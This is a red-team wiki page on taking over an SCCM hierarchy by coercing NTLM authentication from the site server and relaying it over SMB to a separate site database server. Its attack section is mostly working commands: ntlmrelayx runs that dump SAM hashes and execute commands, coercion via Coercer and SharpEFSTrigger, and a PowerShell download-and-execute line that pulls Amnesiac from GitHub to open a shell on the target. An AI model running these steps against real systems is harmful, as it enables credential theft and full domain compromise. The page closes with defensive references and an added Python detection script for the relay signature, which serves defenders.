# TAKEOVER-2

## Document Reference

* [TAKEOVER-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/TAKEOVER/TAKEOVER-2/takeover-2_description.md)

## Description

Hierarchy takeover via NTLM coercion and relay to SMB on remote site database

## Requirements

* PKI certificates are not required for client authentication (default)
* SCCM database server hosted on a system that is independent of the main site server
* SMB is reachable and SMB signing isn’t required on the site database server
* Local Administrator if performing the attack from Windows (due to SMB port redirect)

## Tools Required

* divertTCPConn: <https://github.com/Arno0x/DivertTCPconn>
* Coercion Tools: <https://github.com/The-Viper-One/RedTeam-Pentest-Tools/tree/main/Coercion>
* ntlmrelayx: <https://github.com/The-Viper-One/RedTeam-Pentest-Tools/blob/main/Relay/ntlmrelayx.exe>

## Windows

Divert SMB on port 445 to port 8445 (Requires Local Administrator)

```
divertTCPconn.exe 445 8445
```

Set up ntlmrelayx to listen on the alternate SMB port and target the MSSQL database server

```
# Dump SAM
ntlmrelayx.exe --smb-port 8445 -smb2support -t <MSSQL SCCM IP>

# Execute Commands
ntlmrelayx.exe --smb-port 8445 -smb2support -t 192.168.60.12 -c "[Command]"
```

Perform the coercion with Coercer or SharpEFSTrigger to relay the SCCM Site Server computer account to the MSSQL database server.

{% code overflow="wrap" %}

```powershell
# Option 1: Coercer
Coercer.exe coerce -u [Username] -p "[Password]" -d [Domain] -t [Site Server IP] -l [Listener IP] --auth-type smb --filter-method-name EfsRpcDecryptFileSrv

# Option 2: SharpEFSTrigger
SharpEFSTrigger.exe <Site Server IP> <Listener IP> EfsRpcDecryptFileSrv
```

{% endcode %}


### Getting a full shell on Windows with Amnesiac

* Amnesiac: <https://github.com/Leo4j/Amnesiac>

Load Amnesiac through PowerShell

```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac
```

Generate a global listener payload with option [2]


Use the payload within ntlmrelayx to be executed on the target system.

```powershell
# Setup with ntlmrelayx
ntlmrelayx.exe -t 192.168.60.12 -smb2support --smb-port 8445 -c "[PAYLOAD]"
```

Once we trigger coercion again, ntlmrelayx will execute the PowerShell payload on the target system. Once this is done, use option [3] in Amnesiac to connect.


### Defensive IDs

* [DETECT-1: Monitor site server domain computer accounts authenticating from another source](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/DETECT/DETECT-1/detect-1_description.md)
* [PREVENT-12: Require SMB signing on site systems](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md)
* [PREVENT-20: Block unnecessary connections to site systems](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
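The relay described on this page leaves a recognisable trace on the site database server: the site server's computer account logs on over the network with NTLM, but from the attacker's listener address rather than from the site server itself, which is what DETECT-1 looks for. The following is an added example of that check, not code from the Misconfiguration Manager project; the account name `SCCM-SITE$`, the site server address `192.168.60.10` and the sample 4624/4625 records are all constructed for illustration.

```python
"""DETECT-1 style check: site server computer account logging on from an unexpected source.

Added example, not part of the Misconfiguration Manager project. Assumes Windows
Security log events from the site database server have already been parsed into
LogonEvent records; the inventory values and sample events are constructed.
"""
from dataclasses import dataclass

# Assumed inventory: the site server's computer account and the address(es) it logs on from.
SITE_SERVER_ACCOUNT = "SCCM-SITE$"
SITE_SERVER_IPS = {"192.168.60.10"}


@dataclass(frozen=True)
class LogonEvent:
    event_id: int       # 4624 = successful logon, 4625 = failed logon
    account: str        # TargetUserName; computer accounts end with '$'
    logon_type: int     # 3 = network logon (SMB, MSSQL over TDS, ...)
    auth_package: str   # "NTLM" or "Kerberos"
    source_ip: str      # IpAddress field of the event


# Constructed sample events as recorded on the site database server.
SAMPLE_EVENTS = [
    LogonEvent(4624, "SCCM-SITE$", 3, "NTLM", "192.168.60.10"),      # site server -> DB, expected
    LogonEvent(4624, "SCCM-SITE$", 3, "NTLM", "192.168.60.55"),      # same account, unexpected source
    LogonEvent(4624, "jdoe", 3, "Kerberos", "192.168.60.55"),        # ordinary user, out of scope
    LogonEvent(4624, "SCCM-SITE$", 3, "Kerberos", "192.168.60.10"),  # expected source, Kerberos
    LogonEvent(4625, "SCCM-SITE$", 3, "NTLM", "192.168.60.55"),      # failed attempt, not a 4624
]


def is_suspicious(ev: LogonEvent) -> bool:
    """True for a successful network logon of the site server account from an
    address that is not the site server. A relayed authentication always arrives
    as NTLM, so the package is reported alongside the source for triage."""
    return (ev.event_id == 4624
            and ev.account.upper() == SITE_SERVER_ACCOUNT
            and ev.logon_type == 3
            and ev.source_ip not in SITE_SERVER_IPS)


def find_relayed_logons(events) -> list[tuple[str, str]]:
    """Return (source_ip, auth_package) for every suspicious logon, in log order."""
    return [(ev.source_ip, ev.auth_package) for ev in events if is_suspicious(ev)]


if __name__ == "__main__":
    for ip, pkg in find_relayed_logons(SAMPLE_EVENTS):
        print(f"ALERT: {SITE_SERVER_ACCOUNT} logged on via {pkg} from unexpected host {ip}")
```

Feeding real 4624 events into `LogonEvent` and keeping `SITE_SERVER_IPS` accurate is what turns this into a usable alert; an NTLM hit from a host that is neither the site server nor a known site system is the relay signature.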
